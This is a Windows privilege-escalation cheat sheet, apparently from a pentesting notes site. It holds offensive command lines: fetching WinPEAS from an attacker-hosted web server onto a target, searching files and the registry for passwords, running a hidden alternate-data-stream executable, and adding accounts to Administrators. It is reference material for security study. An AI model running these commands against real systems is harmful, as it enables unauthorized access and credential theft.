Exploit Notes

Windows Privilege Escalation

Last modified: 2023-03-05

Active Directory Privilege Escalation Windows

Privilege Escalation (PrivEsc) in Windows is a process that get the Administrator credential and login.

Automation

WinPEAS scans the Local Privilege Escalation vulnerabilities on Windows machine automatically.

1. Download WinPEAS on Your Local Machine

wget https://github.com/carlospolop/PEASS-ng/releases/download/20220710/winPEAS.bat

Start web server to allow the target machine to get the WinPEAS.

python3 -m http.server 8000

2. Transfer WinPEAS using PowerShell on the Target Machine

cd \Users\<user-name>\Desktop
powershell

Invoke-WebRequest -Uri http://<your-local-ip>:8000/winPEAS.bat -OutFile .\winPEAS.bat
# or
curl http://<your-local-ip>:8000/winPEAS.bat -o .\winPEAS.bat

3. Execute WinPEAS

.\winPEAS.bat

LOLBAS

LOLBAS provides misuses tools and executables already in the Windows system. So check the web page.


OS Information

hostname
systeminfo
systeminfo | findstr "OS"
ver

# Current user
whoami
whoami /user
whoami /groups
whoami /priv
whoami /all
echo %username%

# List users and groups
net users
net user USERNAME
net group
net localgroup

# Network
ipconfig
ipconfig /all
print route
arp -A

# Firewall
netsh firewall show state
netsh firewall show config
netsh advfirewall show allprofiles

Recent Files

  1. Right-click on the Windows icon.
  2. Click the “Run”.
  3. Type “recent” in the search form.

Running Services

Using the Windows Management Instrumentation command-line (WMIC) mainly.

wmic service list
wmic service list | findstr "Backup"

# Get target process info
wmic process get processid,parentprocessid,executablepath | find "<process-id>"
# Get users SID
wmic useraccount get name,sid
# Launch the hidden executable hiding within ADS
wmic process call create $(Resolve-Path .\file.exe:streamname)

# Processes and services
sc query state=all
tasklist /svc

# Query the configuration info for a specified service
sc qc "Development Service"

Histories

Web Browser History (Internet Explorer)

  1. Open Internet Explorer, click on the star icon.
  2. Select History tab.

Command History in PowerShell Console

type c:\Users\<username>\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

VSS (Volume Shadow Copy Service)

VSS coordinates the actions that are required to create a consistent a shadow copy (also known as a snapshot or a point-in-time copy) of the data that is to be backed up.

vssadmin
vssadmin list shadows
vssadmin list volumes

Sensitive Information

# /s: Searches the current directory and all subdirectories.
# /i: Ignores the case of the characters.
findstr /si password *.txt *.xml *.ini
findstr /si password c:\Users\Administrator\*.txt
findstr /si cred *.txt *.xml *.ini
findstr /si cred c:\Users\Administrator\*.txt

# /p: Skips files with non-printable characters.
# /n: Prints the line number of each line that matches.
findstr /spin "password" *.*
findstr /spin "password" c:\Users\Administrator\*

# ListList files
# /a: Displays only the names of those directories and files.
dir /a \Users\Administrator\Desktop
# /s: Lists every oncurrece of the specified file name within the specified directory and all subdirectories.
dir /s *pass* == *cred* == *vnc* == *.config*
# /q: Displays the ownership information.
dir /q \Users\Administrator\Desktop

# SQL server
dir c:\SQLServer\Logs
type c:\SQLServer\Logs\ERRORLOG.BAK

# Get contents of file
more .\example.txt
type .\example.txt

# Registry subkey information
# query: Returns a list of the next tier of subkeys and entries that are located under a specified subkey in the registry
# HKLM: The keyname of HKEY_LOCAL_MACHINE
# /f: Specifies the data or pattern to search for.
# /t: Specifies registry types to search.
# /s: Specifies to query all subkeys and value names recursively.
reg query HKLM /f password /t REG_SZ /s

# Check Recycle.bin and SID Folder
cd \'$Recycle.Bin'

Find Interesting Files

PS> Get-ChildItem -Path c:\\ -Filter "*.txt" -Recurse 2>$null
# Directories
PS> Get-ChildItem -Path c:\\ -Directory -Filter "Example" -Recurse 2>$null

Getting All Local Users/Groups

We can find all local users in Computer Management utility. To open, enter "computer management" in search form at the bottom of the windows screen.

In Computer Management, click "Local Users and Groups".

Enumerate Users

  1. Click "Users".
  2. Double-click each user to get details e.g. "Member Of".

Enumerate Groups

  1. Click "Groups".
  2. Double-click each group.
  3. Attempt to add new user in the group because we might be able to do that even if we are not an administrator.

Change File Permission

  1. Right-click on the file.
  2. Select the Properties.
  3. Click the Security tab.
  4. Click “Advanced”.
  5. In the Permissions tab, click the “Add”.
  6. Click “Select a principal”.
  7. Enter the username in the text field.
  8. Click OK and Apply.

Also we can change permissions in CommandPrompt or PowerShell.

icacls 'C:\Path\to\file' /grant Users:F
icacls 'C:\Path\to\file' /grant Everyone:F

Change User Permission

# Change user's password
net user USERNAME NEWPASSWORD

# Add new user
net user /add USERNAME PASSWORD

# Add user to group
net localgroup Administrators USERNAME /add
net localgroup "Remote Managment Users" USERNAME /add   # For WinRM
net localgroup "Remote Desktop Users" USERNAME /add     # For RDP

If we could change the permission, connect to the target via WinRM or RDP.


Take Ownership of a File (Administrators Group Required)

# Check if the current user belongs to the Administrators group. 
net user USERNAME

# Move to the directory containing the desired file
cd \Users\Administrator\Desktop

# Enable an administrator to recover access to a file.
# /R: recursive operation
# /F: specify the filename
takeown /r /f *.*

# Modify dictionary access control lists on specified files
# /q: suppress success message
# /c: continue the operation despite any file errors
# /t: perform the operation on all specified files
# /grant: grant specified user access rights
icacls "example.txt" /q /c /t /grant Users:F

Switch Another User

runas /user:<domain>\<username> cmd

Event Logs

  • Event Viewer
  • FullEventLogview

Tasks

  • Task Schedular

Sysinternals

Tools that offer technical resources and utilities to manage, diagnose, troubleshoot, and monitor a Microsoft Windows environment.

# Autoruns
# It shows what programs are configured to run during system bootup or login.
autoruns.exe

# Process Explorer
# A freeware task manager and system monitor.
procexp.exe
procexp64.exe

# Process Monitor
# It monitors and displays in real-time all file system activity.
procmon.exe
procmon64.exe

# Strings
# It is same as the Linux “strings” command.
strings.exe example.exe | findstr "sometext"
strings64.exe example.exe | findstr "sometext"

Tools by HDKS

Fuzzagotchi

Automatic web fuzzer.

aut0rec0n

Auto reconnaissance CLI.

Hash Cracker

Hash identifier.